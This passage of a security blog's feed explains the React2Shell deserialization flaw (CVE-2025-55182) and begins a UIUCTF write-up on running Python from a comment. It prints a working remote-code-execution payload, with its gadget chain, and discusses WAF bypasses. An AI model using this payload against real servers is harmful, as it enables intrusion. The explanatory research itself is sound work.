<span data-line=""><span style="color:#ADBAC7">  &lt;</span><span style="color:#8DDB8C">input</span><span style="color:#6CB6FF"> name</span><span style="color:#F47067">=</span><span style="color:#96D0FF">"email"</span><span style="color:#ADBAC7"> /&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">  &lt;</span><span style="color:#8DDB8C">button</span><span style="color:#6CB6FF"> type</span><span style="color:#F47067">=</span><span style="color:#96D0FF">"submit"</span><span style="color:#ADBAC7"> /&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">&lt;/</span><span style="color:#8DDB8C">form</span><span style="color:#ADBAC7">&gt;</span></span></code></pre></figure>
<p>At a high level, the client runtime:</p>
<ol>
<li>Intercepts the submit event</li>
<li>Reads the browser's <code>FormData</code> object</li>
<li>Re-encodes that data into Flight chunks (IDs <code>0</code>, <code>1</code>, <code>2</code>, ...) representing the arguments to <code>myServerAction</code></li>
<li>Sends it to the server as a POST targeted at the server-action endpoint (e.g. Next.js’ Next-Action route), with:
<ul>
<li><code>Next-Action: &lt;id&gt;</code> (or <code>rsc-action-id</code>), indicating the ID of the action to call</li>
<li><code>Content-Type: multipart/form-data; boundary=...</code></li>
<li>Parts named <code>0</code>, <code>1</code>, <code>2</code>, ..., whose values are Flight-encoded strings representing the arguments to <code>myServerAction</code>.</li>
</ul>
</li>
</ol>
<p>On the server, Next.js hands the <code>FormData</code> instance straight into React's decoder, which treats the parts as Flight chunks and feeds them through <code>reviveModel</code>.</p>
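<p>The client-side steps above can be sketched roughly as follows. This is a simplified illustration, not React's encoder: it assumes each argument can be represented as plain JSON, and the argument values and the action ID are made-up placeholders.</p>

```javascript
// Hypothetical arguments for myServerAction; not taken from a real request.
const args = [{ email: "user@example.com" }];

// FormData is a global in Node.js 18+ and in browsers.
const body = new FormData();
args.forEach((arg, index) => {
  // Each part is named after its chunk ID and holds a JSON-like string.
  body.append(String(index), JSON.stringify(arg));
});

// Hypothetical placeholder; real action IDs are generated by the framework.
const headers = { "Next-Action": "example-action-id" };

const partNames = [...body.keys()];
const firstPart = body.get("0");
console.log(partNames, firstPart, headers);
```

<p>When a <code>FormData</code> body is passed to <code>fetch</code>, the <code>multipart/form-data</code> content type and boundary are filled in automatically, so they are not set by hand here.</p>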
<p>The exploit makes use of this feature to send a serialized object that eventually results in the server constructing a <code>Function</code> object and calling it.</p>
<h2>The Exploit</h2>
<p>There are now several public PoC exploits circulating online. Lachlan Davidson was the original reporter of the vulnerability, and his PoC is available <a href="https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc/blob/main/01-submitted-poc.js">here</a>.</p>
<p><a href="https://x.com/@maple3142">maple3142</a> was the first to publish a <a href="https://x.com/maple3142/status/1996687157789155647">public exploit</a>, more than 24 hours after the public patch came out.
I've known Maple through the CTF community for a while, and honestly, I'm not surprised that a CTF player was the first to reverse engineer an exploit for this vulnerability.
Many in the community have called this a very CTF-like exploit: it requires diving deep into React internals, understanding the Flight protocol, and some ingenuity (i.e. "hacker mindset") to come up with
a working exploit.</p>
<p>A minimum viable exploit looks like this:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">{</span></span>
<span data-line=""><span style="color:#6CB6FF">  0</span><span style="color:#ADBAC7">: {</span></span>
<span data-line=""><span style="color:#ADBAC7">    status: </span><span style="color:#96D0FF">"resolved_model"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">    reason: </span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">    _response: {</span></span>
<span data-line=""><span style="color:#ADBAC7">      _prefix: </span><span style="color:#96D0FF">"console.log('1337')//"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">      _formData: {</span></span>
<span data-line=""><span style="color:#ADBAC7">        get: </span><span style="color:#96D0FF">"$1:then:constructor"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">      },</span></span>
<span data-line=""><span style="color:#ADBAC7">    },</span></span>
<span data-line=""><span style="color:#ADBAC7">    then: </span><span style="color:#96D0FF">"$1:then"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">    value: </span><span style="color:#96D0FF">'{"then":"$B"}'</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">  },</span></span>
<span data-line=""><span style="color:#6CB6FF">  1</span><span style="color:#ADBAC7">: </span><span style="color:#96D0FF">"$@0"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Moritz Sanft gave a great technical breakdown of why this works <a href="https://github.com/msanft/CVE-2025-55182">here</a>, which I highly recommend reading.
I will try to break this down for technical but non-security folks.</p>
<h3>Accessing JavaScript Internals</h3>
<p><a href="https://github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d">This</a> patch gives us a clue: it adds
<code>hasOwnProperty</code> checks to check whether the key being resolved actually exists on the object that it was accessing.</p>
<p>Prior to this patch, we could access the <code>constructor</code> property of any object:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">{</span></span>
<span data-line=""><span style="color:#6CB6FF">  0</span><span style="color:#ADBAC7">: [</span><span style="color:#96D0FF">"$1:__proto__:constructor:constructor"</span><span style="color:#ADBAC7">],</span></span>
<span data-line=""><span style="color:#6CB6FF">  1</span><span style="color:#ADBAC7">: {</span><span style="color:#96D0FF">"x"</span><span style="color:#ADBAC7">: </span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">},</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>For those unacquainted with JavaScript quirks, the <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/constructor"><code>constructor</code></a> property of any <code>Object</code> is a <em>reference</em> to the function that was used to create the object.
Note that this returns a reference to the function <em>itself</em>, not just the function name. This means that following <code>constructor</code> twice gives us the constructor of the constructor, i.e. <code>Function</code> itself.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">&gt;</span><span style="color:#ADBAC7"> {}.</span><span style="color:#6CB6FF">constructor</span></span>
<span data-line=""><span style="color:#ADBAC7">[Function: Object]</span></span>
<span data-line=""><span style="color:#F47067">&gt;</span><span style="color:#ADBAC7"> {}.</span><span style="color:#6CB6FF">constructor</span><span style="color:#ADBAC7">.</span><span style="color:#6CB6FF">constructor</span></span>
<span data-line=""><span style="color:#ADBAC7">[Function: Function]</span></span>
<span data-line=""><span style="color:#F47067">&gt;</span><span style="color:#ADBAC7"> {}.</span><span style="color:#6CB6FF">constructor</span><span style="color:#ADBAC7">.</span><span style="color:#DCBDFB">constructor</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"console.log(1337)"</span><span style="color:#ADBAC7">)()</span></span>
<span data-line=""><span style="color:#6CB6FF">1337</span></span></code></pre></figure>
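<p>To illustrate what an own-property check changes, here is a simplified sketch of a resolver for colon-separated references. <code>resolvePath</code> and its <code>ownOnly</code> option are hypothetical and only mirror the idea of walking a path of property names; this is not React's implementation.</p>

```javascript
// Hypothetical, simplified resolver for references like "$1:a:b".
function resolvePath(chunks, reference, { ownOnly }) {
  const [id, ...path] = reference.slice(1).split(":");
  let value = chunks[id];
  for (const key of path) {
    if (ownOnly) {
      // Only follow keys that exist on the object itself.
      if (!Object.prototype.hasOwnProperty.call(value, key)) {
        throw new Error("Invalid reference: " + key);
      }
    }
    value = value[key];
  }
  return value;
}

const chunks = { 1: { x: 1 } };

// Without the check, inherited properties lead to Function.
const unsafe = resolvePath(chunks, "$1:constructor:constructor", { ownOnly: false });

// With the check, own keys still resolve but inherited ones are rejected.
const safe = resolvePath(chunks, "$1:x", { ownOnly: true });
let blocked = false;
try {
  resolvePath(chunks, "$1:constructor:constructor", { ownOnly: true });
} catch (err) {
  blocked = true;
}

console.log(unsafe === Function, safe, blocked);
```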
<h3>Making a Fake Promise</h3>
<p>Now what we need is a gadget to achieve RCE. We want to find some way to call this constructor with a user-controlled argument.</p>
<p>The basic idea behind the public PoCs is that we can make chunk 0 look like a <code>Promise</code> object, and have React treat it as such.
Since JavaScript is a dynamically typed language, there are no guarantees on whether the object is actually a <code>Promise</code> object, or just some other object that happens to have a <code>then</code> property.
Regardless, if something looks like a <code>Promise</code>, then for all intents and purposes, it is a <code>Promise</code>.</p>
<p>In the Flight protocol, the <code>$@</code> syntax tells React that the chunk being referenced is a promise. By using this, we can make React
call the <code>then</code> method of the "promise" object using the <code>await ...then</code> pattern.</p>
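<p>The duck-typing point can be seen in isolation with a short sketch in plain JavaScript, unrelated to React's internals. <code>fakePromise</code> and <code>demo</code> are illustrative names: any object with a <code>then</code> method is treated as a promise by <code>await</code>.</p>

```javascript
// A plain object with a `then` method; it is not an instance of Promise.
const calls = [];
const fakePromise = {
  then(resolve, reject) {
    calls.push("then called");
    resolve(42);
  },
};

async function demo() {
  // `await` sees a `then` method and calls it with resolve/reject callbacks.
  const value = await fakePromise;
  return { value, calls, isRealPromise: fakePromise instanceof Promise };
}

const result = demo();
result.then((r) => console.log(r));
```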
<p>Crucially, the internal representation of <code>Chunk</code> objects contains their own <code>then</code> method, which checks the <code>status</code> of the chunk and calls the appropriate handler.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="typescript" data-theme="github-dark-dimmed"><code data-language="typescript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#6CB6FF">Chunk</span><span style="color:#ADBAC7">.</span><span style="color:#6CB6FF">prototype</span><span style="color:#ADBAC7">.</span><span style="color:#DCBDFB">then</span><span style="color:#F47067"> =</span><span style="color:#F47067"> function</span><span style="color:#ADBAC7"> &lt;</span><span style="color:#F69D50">T</span><span style="color:#ADBAC7">&gt;(</span></span>
<span data-line=""><span style="color:#6CB6FF">  this</span><span style="color:#F47067">:</span><span style="color:#F69D50"> SomeChunk</span><span style="color:#ADBAC7">&lt;</span><span style="color:#F69D50">T</span><span style="color:#ADBAC7">&gt;,</span></span>
<span data-line=""><span style="color:#DCBDFB">  resolve</span><span style="color:#F47067">:</span><span style="color:#ADBAC7"> (</span><span style="color:#F69D50">value</span><span style="color:#F47067">:</span><span style="color:#F69D50"> T</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">=&gt;</span><span style="color:#F69D50"> mixed</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#DCBDFB">  reject</span><span style="color:#F47067">:</span><span style="color:#ADBAC7"> (</span><span style="color:#F69D50">reason</span><span style="color:#F47067">:</span><span style="color:#F69D50"> mixed</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">=&gt;</span><span style="color:#F69D50"> mixed</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#F47067">  const</span><span style="color:#6CB6FF"> chunk</span><span style="color:#F47067">:</span><span style="color:#F69D50"> SomeChunk</span><span style="color:#ADBAC7">&lt;</span><span style="color:#F69D50">T</span><span style="color:#ADBAC7">&gt; </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> this</span><span style="color:#ADBAC7">;</span></span>
<span data-line=""><span style="color:#F47067">  switch</span><span style="color:#ADBAC7"> (chunk.status) {</span></span>
<span data-line=""><span style="color:#F47067">    case</span><span style="color:#6CB6FF"> RESOLVED_MODEL</span><span style="color:#ADBAC7">: </span><span style="color:#768390">// "resolved_model"</span></span>
<span data-line=""><span style="color:#DCBDFB">      initializeModelChunk</span><span style="color:#ADBAC7">(chunk);</span></span>
<span data-line=""><span style="color:#F47067">      break</span><span style="color:#ADBAC7">;</span></span>
<span data-line=""><span style="color:#ADBAC7">  }</span></span>
<span data-line=""><span style="color:#F47067">  ...</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
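<p>The key to this exploit is that we can overwrite the <code>.then</code> of chunk 0 with the <code>.then</code> of chunk 1, which is exactly the method above! Chunk 1 is <code>$@0</code>, so it resolves to a real <code>Chunk</code> object, and <code>$1:then</code> picks up the <code>then</code> method from its prototype.</p>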
<p>Now, this chunk object that looks like a regular <code>Promise</code> is treated as such by React, so it calls the code above and we land in the switch statement.</p>
<p>From here, we can simply set <code>status: "resolved_model"</code> in our chunk object so that we land in the <code>initializeModelChunk</code> function, which is where the magic happens.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="typescript" data-theme="github-dark-dimmed"><code data-language="typescript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">function</span><span style="color:#DCBDFB"> initializeModelChunk</span><span style="color:#ADBAC7">&lt;</span><span style="color:#F69D50">T</span><span style="color:#ADBAC7">&gt;(</span><span style="color:#F69D50">chunk</span><span style="color:#F47067">:</span><span style="color:#F69D50"> ResolvedModelChunk</span><span style="color:#ADBAC7">&lt;</span><span style="color:#F69D50">T</span><span style="color:#ADBAC7">&gt;)</span><span style="color:#F47067">:</span><span style="color:#6CB6FF"> void</span><span style="color:#ADBAC7"> {</span></span>
<span data-line=""><span style="color:#F47067">  ...</span></span>
<span data-line=""><span style="color:#F47067">  const</span><span style="color:#6CB6FF"> rawModel</span><span style="color:#F47067"> =</span><span style="color:#6CB6FF"> JSON</span><span style="color:#ADBAC7">.</span><span style="color:#DCBDFB">parse</span><span style="color:#ADBAC7">(resolvedModel);</span></span>
<span data-line=""><span style="color:#F47067">  const</span><span style="color:#6CB6FF"> value</span><span style="color:#F47067">:</span><span style="color:#F69D50"> T</span><span style="color:#F47067"> =</span><span style="color:#DCBDFB"> reviveModel</span><span style="color:#ADBAC7">(</span></span>
<span data-line=""><span style="color:#ADBAC7">    response,</span></span>
<span data-line=""><span style="color:#ADBAC7">    {</span><span style="color:#96D0FF">''</span><span style="color:#ADBAC7">: rawModel},</span></span>
<span data-line=""><span style="color:#96D0FF">    ''</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">    rawModel,</span></span>
<span data-line=""><span style="color:#ADBAC7">    rootReference,</span></span>
<span data-line=""><span style="color:#ADBAC7">  );</span></span>
<span data-line=""><span style="color:#F47067">  ...</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Here, our <code>.value</code> is parsed as a JSON object and passed to <code>reviveModel</code>, which is a function that recursively deserializes the JSON object into a JavaScript object
by resolving references.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="typescript" data-theme="github-dark-dimmed"><code data-language="typescript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">case</span><span style="color:#96D0FF"> 'B'</span><span style="color:#ADBAC7">: {</span></span>
<span data-line=""><span style="color:#ADBAC7">  const id </span><span style="color:#F47067">=</span><span style="color:#DCBDFB"> parseInt</span><span style="color:#ADBAC7">(value.</span><span style="color:#DCBDFB">slice</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">2</span><span style="color:#ADBAC7">), </span><span style="color:#6CB6FF">16</span><span style="color:#ADBAC7">);</span></span>
<span data-line=""><span style="color:#ADBAC7">  const prefix </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> response._prefix;</span></span>
<span data-line=""><span style="color:#ADBAC7">  const blobKey </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> prefix </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> id;</span></span>
<span data-line=""><span style="color:#ADBAC7">  const backingEntry: Blob </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> (response._formData.</span><span style="color:#DCBDFB">get</span><span style="color:#ADBAC7">(blobKey): any);</span></span>
<span data-line=""><span style="color:#ADBAC7">  return backingEntry;</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Here, we have our gadget! Since we control the <code>response</code> object, we can simply set <code>_prefix</code> to the body of our desired function, e.g. <code>console.log('1337')//</code>,
and <code>_formData.get</code> to the <code>Function</code> constructor, so that the lookup effectively becomes <code>Function("console.log('1337')//...")</code>. The trailing <code>//</code> comments out the <code>id</code> that gets appended to the prefix.</p>
<p>This is then returned as the <code>.then</code> of our crafted <code>Promise</code> object, so that when the <code>Promise</code> is resolved by React, our custom function is called.</p>
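<p>The gadget can be reproduced locally with a harmless stand-in. The sketch below copies the steps of the <code>'B'</code> case into a hypothetical <code>reviveBlobReference</code> function and runs it against a hand-built <code>response</code> object whose function body just returns a number. It is a simulation of the logic, not a request against a real server.</p>

```javascript
// Stand-in for the attacker-controlled object; field names follow the
// snippet above, but the function body here is a harmless example.
const response = {
  _prefix: "return 1337//",
  _formData: { get: Function },
};

// Same steps as the 'B' case above, applied to the value "$B".
function reviveBlobReference(response, value) {
  const id = parseInt(value.slice(2), 16); // the empty string parses to NaN
  const blobKey = response._prefix + id;   // "return 1337//NaN"
  return response._formData.get(blobKey);  // Function("return 1337//NaN")
}

const revived = reviveBlobReference(response, "$B");
const output = revived();
console.log(typeof revived, output);
```

<p>Because <code>get</code> is the <code>Function</code> constructor, the "lookup" builds a new function from the prefix string, and the <code>//</code> turns the appended <code>NaN</code> into a comment.</p>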
<h2>The Aftermath</h2>
<h3>WAF Mitigations</h3>
<p>In the days following the vulnerability, major cloud providers and CDNs have implemented WAF mitigations to block exploits. Vercel has introduced a <a href="https://hackerone.com/vercel_platform_protection">public bug bounty</a> for WAF bypasses.</p>
<p>Many have compared this incident to the infamous <a href="https://en.wikipedia.org/wiki/Log4Shell">Log4Shell</a> vulnerability, which happened at the same time of year back in 2021.</p>
<p>What makes this vulnerability quite different is that it is much harder to block using naive WAF rules. There are two layers of complexity to unpack here:</p>
<ol>
<li><strong>HTTP parser differentials:</strong> this issue is infamous in the security industry. James Kettle has spent years researching HTTP parser differentials between different web proxies and servers. A number of bypasses we have discovered and
seen in the wild have been due to differences in how WAFs and the Node.js HTTP server + form data parsing libraries parse the HTTP request.</li>
<li><strong>JavaScript internals:</strong> naive blacklisting of certain keywords essentially turns this into a "jail" CTF challenge. You have to be <em>absolutely</em> sure there is no way at all to get to the <code>Function</code> constructor.</li>
</ol>
<h3>Community Response</h3>
<p>There has perhaps never been a better example in recent memory of the power of the security community to respond to critical vulnerabilities that threaten to break the Internet as we know it.</p>
<p>At Hacktron, we've been working closely with Vercel and other security teams to test mitigations and report bypasses. Similar work has been done by other teams, such as <a href="https://www.assetnote.io/">AssetNote</a>.</p>
<p>This incident has also sparked some much-needed debate in the community about the place of human security research in an age of LLM hype.
The complex exploit chain and deep study of React internals required to discover this vulnerability are a perfect example of why LLMs are not a substitute for real human security research right now.</p>
<p>We believe that 90% of security issues are variants of known patterns, but once in a while, we have novel ideas that require a deep understanding of the system being exploited,
and this is where human security research shines. Right now, there is a lot of abstraction and a unique mental model required to come up with such exploits that LLM agents have yet to fully encapsulate.</p>
<p>The Server Functions feature was a relatively new one, and it's not surprising that a lot of its internals were not widely written about and only understood by a small number of people. That's why it took
Lachlan and Maple so much time to discover and exploit it respectively. LLMs can certainly speed things up, but in their current state, I don't think that a fully autonomous agent would have been capable of discovering <em>and</em> exploiting this vulnerability.</p>
<p>This is why we work so closely with the security community at Hacktron. We believe that the human-LLM synergy is not only required in the immediate term, but also would be what keeps us winning in the long run.</p>
<p>As the situation unfolds, we'll be sharing more details about our work.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[Executing arbitrary Python code from a comment]]></title>
            <link>https://www.analogue.computer/blog/python-zip-confusion</link>
            <guid>https://www.analogue.computer/blog/python-zip-confusion</guid>
            <pubDate>Mon, 28 Jul 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>Can you execute arbitrary Python code from only a comment?</p>
<figure class="mx-auto"><img alt="Challenge" loading="lazy" width="2080" height="620" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fctf_code.9eb3f1ff.png&amp;w=3840&amp;q=75 1x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fctf_code.9eb3f1ff.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>This was the premise of a recent CTF challenge from <a href="https://ctftime.org/event/2640/">UIUCTF 2025</a>
which I found particularly interesting. The challenge was solved by only 11 teams, and I managed to solve it with the help of <a href="https://www.hacktron.ai">Hacktron</a> and a bit of random inspiration at 7AM on a Sunday morning.</p>
<figure class="mx-auto"><img alt="Scan" loading="lazy" width="2101" height="1050" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchall.b64900d9.png&amp;w=3840&amp;q=75 1x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchall.b64900d9.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>This was my first time properly playing a CTF after almost a year on hiatus. This time, playing mostly independently without a cracked team like Blue Water, I managed to solve all the web challenges within the first few hours, but got stuck on this one for quite a bit longer. It did make me realise how much I missed the sport, but also how much AI has fundamentally changed the game. After a long night stuck on a dead end, I customised a few Hacktron agents to help me out, and lo and behold, I solved it 2 hours later:</p>
<figure class="mx-auto"><img alt="Discord Chat" loading="lazy" width="968" height="473" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat1.bed0a79d.png&amp;w=1080&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat1.bed0a79d.png&amp;w=2048&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat1.bed0a79d.png&amp;w=2048&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<h2>The Challenge</h2>
<p>The challenge itself looks deceptively simple. We connect to a service over the network, which runs the following code:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#768390">#!/usr/bin/env python3</span></span>
<span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> tempfile</span></span>
<span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> subprocess</span></span>
<span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> os</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">comment </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> input</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"&gt; "</span><span style="color:#ADBAC7">).replace(</span><span style="color:#96D0FF">"</span><span style="color:#F47067">\n</span><span style="color:#96D0FF">"</span><span style="color:#ADBAC7">, </span><span style="color:#96D0FF">""</span><span style="color:#ADBAC7">).replace(</span><span style="color:#96D0FF">"</span><span style="color:#F47067">\r</span><span style="color:#96D0FF">"</span><span style="color:#ADBAC7">, </span><span style="color:#96D0FF">""</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">code </span><span style="color:#F47067">=</span><span style="color:#F47067"> f</span><span style="color:#96D0FF">"""print("hello world!")</span></span>
<span data-line=""><span style="color:#96D0FF"># This is a comment. Here's another:</span></span>
<span data-line=""><span style="color:#96D0FF"># </span><span style="color:#F47067">{</span><span style="color:#ADBAC7">comment</span><span style="color:#F47067">}</span></span>
<span data-line=""><span style="color:#96D0FF">print("Thanks for playing!")"""</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">with</span><span style="color:#ADBAC7"> tempfile.NamedTemporaryFile(</span><span style="color:#F69D50">mode</span><span style="color:#F47067">=</span><span style="color:#96D0FF">"w"</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">suffix</span><span style="color:#F47067">=</span><span style="color:#96D0FF">".py"</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">delete</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">False</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">as</span><span style="color:#ADBAC7"> f:</span></span>
<span data-line=""><span style="color:#ADBAC7">    f.write(code)</span></span>
<span data-line=""><span style="color:#ADBAC7">    temp_filename </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> f.name</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">try</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#ADBAC7">    result </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> subprocess.run(</span></span>
<span data-line=""><span style="color:#ADBAC7">        [</span><span style="color:#96D0FF">"python3"</span><span style="color:#ADBAC7">, temp_filename], </span><span style="color:#F69D50">capture_output</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">True</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">text</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">True</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">timeout</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">5</span></span>
<span data-line=""><span style="color:#ADBAC7">    )</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">    if</span><span style="color:#ADBAC7"> result.stdout:</span></span>
<span data-line=""><span style="color:#6CB6FF">        print</span><span style="color:#ADBAC7">(result.stdout, </span><span style="color:#F69D50">end</span><span style="color:#F47067">=</span><span style="color:#96D0FF">""</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#F47067">    if</span><span style="color:#ADBAC7"> result.stderr:</span></span>
<span data-line=""><span style="color:#6CB6FF">        print</span><span style="color:#ADBAC7">(result.stderr, </span><span style="color:#F69D50">end</span><span style="color:#F47067">=</span><span style="color:#96D0FF">""</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">except</span><span style="color:#ADBAC7"> subprocess.TimeoutExpired:</span></span>
<span data-line=""><span style="color:#6CB6FF">    print</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"Timeout"</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#F47067">finally</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#ADBAC7">    os.unlink(temp_filename)</span></span></code></pre></figure>
<p>Essentially, a Python file is created with the following content, and we can inject arbitrary content into the comment:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#6CB6FF">print</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"hello world!"</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#768390"># This is a comment. Here's another:</span></span>
<span data-line=""><span style="color:#768390"># &lt;user input&gt;</span></span>
<span data-line=""><span style="color:#6CB6FF">print</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"Thanks for playing!"</span><span style="color:#ADBAC7">)</span></span></code></pre></figure>
<p>However, since <code>input()</code> only reads a single line, and any CR (<code>\r</code>) and LF (<code>\n</code>) characters are stripped anyway, it seems we can only inject a single line of text after the <code>#</code> (i.e. we can't break out of the comment to write executable code). How can we possibly execute arbitrary code in this context?</p>
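<p>To try payloads offline, the templating step is easy to mirror locally. The following is a minimal sketch rather than anything from the challenge itself: <code>render</code> and <code>count_statements</code> are hypothetical helper names, and the check only reflects how the regular parser sees the generated file.</p>

```python
import ast

# Mirrors the template from the challenge source shown above.
TEMPLATE = '''print("hello world!")
# This is a comment. Here's another:
# {comment}
print("Thanks for playing!")'''


def render(comment):
    """Strip CR/LF the way the service does, then fill in the template."""
    cleaned = comment.replace("\n", "").replace("\r", "")
    return TEMPLATE.format(comment=cleaned)


def count_statements(source):
    """Number of top-level statements the regular parser sees."""
    return len(ast.parse(source).body)


if __name__ == "__main__":
    payloads = ["hello", "\nimport os", "\r\n__import__('os').system('id')"]
    for payload in payloads:
        print(repr(payload), count_statements(render(payload)))
```

<p>Each of these payloads leaves the file with exactly two top-level statements, the two <code>print</code> calls, which is why breaking out of the comment looks impossible at first.</p>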
<h2>Idea 1: Parser Bugs</h2>
<p><em>BTW this was a dead end, so if you want the actual solution, skip to the next section.</em></p>
<p>I chanced upon <a href="https://github.com/python/cpython/issues/96670">this issue</a> which described a parser bug that was fixed in Python 3.12.0 and 3.11.4. Essentially, lines in the source code could be terminated early by a null byte (since C-strings are null-terminated), which led to unexpected behaviour in the parser.</p>
<figure class="mx-auto"><img alt="CPython Issue" loading="lazy" width="1391" height="1112" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcpython_issue.e7d8028e.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcpython_issue.e7d8028e.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcpython_issue.e7d8028e.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
